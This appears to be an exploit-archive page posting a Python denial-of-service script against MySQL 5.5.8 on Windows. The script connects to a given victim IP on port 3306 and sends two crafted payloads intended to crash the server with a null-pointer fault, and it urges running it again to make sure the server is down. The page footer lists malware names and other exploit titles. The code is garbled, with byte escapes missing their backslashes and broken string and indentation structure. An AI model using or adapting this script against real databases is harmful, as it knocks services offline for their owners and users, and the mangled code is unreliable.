MySQL 5.5.8 Denial Of Service

Posted on 25 December 2011

import socket, sys

print "
"
print "----------------------------------------------------------------"
print "| MySQL 5.5.8 Null Ptr (windows) |"
print "| Level Smash the Stack |"
print "----------------------------------------------------------------"
print "
"

buf=("&x00x00x01x85xa2x03x00x00x00x00@x93x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00rootx00x00")

buf2=("x11x00x00x00x03set autocommit30")

def usage():
print "usage : ./mysql.py <victim_ip>"
print "example: ./mysql.py 192.168.1.22"

def main():
if len(sys.argv) != 2:
usage()
sys.exit()
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

HOST = sys.argv[1]
PORT = int(3306)
s.connect((HOST,PORT))
print "[*] Connect"
s.send(buf)
print "[*] Payload 1 sent"
s.send(buf2)
print "[*] Payload 2 sent
", "[*] Run again to ensure it is down..
"
s.close()

if __name__ == "__main__":
main()

TOP

Malware :

Backdoor:Linux/IoTReaper
Ransom:Linux/Erebus.A
Backdoor:Linux/Luabot.A
DDoS:Linux/Zanich!rfn
Linux.Mokes

Last 20

Exploits :

Customer Support System 1.0 Cross Site Scripting
Xhibiter NFT Marketplace 1.10.2 SQL Injection
WordPress WPCode Lite 2.1.14 Cross Site Scripting
Azon Dominator Affiliate Marketing Script SQL Injection
Simple Laboratory Management System 1.0 SQL Injection

Last 20